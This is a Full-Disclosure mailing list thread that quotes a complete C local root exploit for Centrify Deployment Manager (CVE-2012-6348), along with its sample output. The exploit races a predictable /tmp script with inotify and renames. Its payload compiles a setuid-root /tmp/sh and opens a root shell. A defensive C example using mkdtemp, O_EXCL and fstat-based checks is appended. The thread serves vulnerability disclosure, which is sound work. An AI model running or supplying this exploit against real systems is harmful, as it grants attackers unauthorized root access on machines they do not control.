Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root
- To: noloader@xxxxxxxxx
- Subject: Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Tue, 18 Dec 2012 20:56:37 +0000 (GMT)
These guys were really cool about it, probably one of the best vendor responses I've gotten. I am seeing if I can go to the next iteration of training. =->

On Dec 18, 2012, at 12:51 PM, Jeffrey Walton <noloader@xxxxxxxxx> wrote:

> I've got a feeling you will not be sent to any more vendor classes :)
>
> On Tue, Dec 18, 2012 at 3:49 PM, Larry W. Cashdollar <larry0@xxxxxx> wrote:
> > /*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,
> > Centrify released a fix very quickly - nice vendor response.
> >
> > http://vapid.dhs.org/exploits/centrify_local_r00t.c
> >
> > CVE-2012-6348 12/17/2012
> > http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
> > Greetings vladz, Thanks for the inotify & syscall technique.
> >
> > This exploit is based on http://vladz.devzero.fr/010_bzexe-vuln.php
> >
> > Run the exploit and wait for administrator to analyse or deploy software
> > to the system.
> >
> > larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0
> > [*] Launching attack against "centrify.cmd.0"
> > [+] Creating evil script (/tmp/evil)
> > [+] Creating target file (/bin/touch /tmp/centrify.cmd.0)
> > [+] Initialize inotify
> > [+] Waiting for root to launch "centrify.cmd.0"
> > [+] Opening root shell (/tmp/sh)
> > #
> >
> > Larry W. Cashdollar
> > @_larry0
> > */
> >
> >
> > #include <stdlib.h>
> > #include <stdio.h>
> > #include <unistd.h>
> > #include <sys/stat.h>
> > #include <sys/types.h>
> > #include <string.h>
> > #include <sys/inotify.h>
> > #include <fcntl.h>
> > #include <sys/syscall.h>
> >
> > /*Create a small c program to pop us a root shell*/
> > int create_nasty_shell(char *file) {
> >   char *s = "#!/bin/bash\n"
> >     "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
> >     "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
> >     "chmod 4755 /tmp/sh;\n";
> >
> >   /* world-writable script; it is swapped in for the file root will run */
> >   int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
> >   write(fd, s, strlen(s));
> >   close(fd);
> >
> >   return 0;
> > }
> >
> >
> > int main(int argc, char **argv) {
> >   int fd, wd;
> >   char buf[1], *targetpath, *cmd,
> >        *evilsh = "/tmp/evil", *trash = "/tmp/trash";
> >
> >   if (argc < 2) {
> >     printf("Usage: %s <target file>\n", argv[0]);
> >     return 1;
> >   }
> >
> >   printf("[*] Launching attack against \"%s\"\n", argv[1]);
> >
> >   printf("[+] Creating evil script (/tmp/evil)\n");
> >   create_nasty_shell(evilsh);
> >
> >   /* "/tmp/" + name + NUL; the original used sizeof(argv[1]), i.e. the
> >      size of a pointer, which under-allocates for any name longer than
> >      eight bytes */
> >   targetpath = malloc(strlen(argv[1]) + 6);
> >   cmd = malloc(strlen(targetpath) + 12); /* "/bin/touch " + path + NUL */
> >   sprintf(targetpath, "/tmp/%s", argv[1]);
> >   sprintf(cmd, "/bin/touch %s", targetpath);
> >   printf("[+] Creating target file (%s)\n", cmd);
> >   system(cmd);
> >
> >   /* watch the pre-created file for a metadata change (chmod/chown) */
> >   printf("[+] Initialize inotify\n");
> >   fd = inotify_init();
> >   wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);
> >
> >   /* a 1-byte buffer makes read() return the moment an event is queued;
> >      the two renames then swap the evil script into place by syscall to
> >      keep the race window as short as possible */
> >   printf("[+] Waiting for root to change perms on \"%s\"\n", argv[1]);
> >   syscall(SYS_read, fd, buf, 1);
> >   syscall(SYS_rename, targetpath, trash);
> >   syscall(SYS_rename, evilsh, targetpath);
> >
> >   inotify_rm_watch(fd, wd);
> >
> >   printf("[+] Opening root shell (/tmp/sh)\n");
> >   sleep(2);
> >   system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
> >
> >   return 0;
> > }
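The pattern the exploit races is a privileged process creating, chmod'ing and then running a script at a predictable /tmp path, with the check and the use done by file name. The following is an added example of the defensive counterpart, written for this page and not taken from the thread or from Centrify's product: a fresh mkdtemp() directory, O_EXCL|O_NOFOLLOW creation, and an fstat() check on the open descriptor before that same descriptor is handed to fexecve(). The function names and the /tmp parent directory are assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Validate the file behind an already-open descriptor. fstat() on the fd,
 * never stat() on the path: a rename() between check and use (the window the
 * exploit above wins with inotify) cannot swap the object out. Must be a
 * regular file we own, with one link and no group/other write bit. */
int fd_is_trusted(int fd) {
    struct stat st;
    if (fstat(fd, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode) || st.st_uid != geteuid()) return 0;
    if (st.st_nlink != 1 || (st.st_mode & (S_IWGRP | S_IWOTH))) return 0;
    return 1;
}

/* Create a deployment script without a predictable /tmp/<name>: mkdtemp()
 * makes a fresh 0700 directory nobody else can enter, and
 * O_CREAT|O_EXCL|O_NOFOLLOW refuses any file or symlink already at the path.
 * Returns an fd usable with fexecve(); `path` receives the script path.
 * `parent` is an assumed writable directory (the test below uses /tmp). */
int create_private_script(const char *parent, const char *body,
                          char *path, size_t pathlen) {
    char dir[4096];
    snprintf(dir, sizeof dir, "%s/deployXXXXXX", parent);
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(path, pathlen, "%s/run.sh", dir);
    int fd = open(path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0700);
    if (fd < 0) return -1;
    size_t len = strlen(body);
    if (write(fd, body, len) != (ssize_t)len) { close(fd); return -1; }
    return fd;
}

/* Remove the script and its private directory once the run is over. */
void remove_private_script(const char *path) {
    char dir[4096], *slash;
    snprintf(dir, sizeof dir, "%s", path);
    if ((slash = strrchr(dir, '/')) != NULL) *slash = '\0';
    unlink(path);
    rmdir(dir);
}
```

fd_is_trusted() rejects a 0777 file like the /tmp/evil the exploit plants, and a rename() after the check no longer matters because the check and the execution share one descriptor.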
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/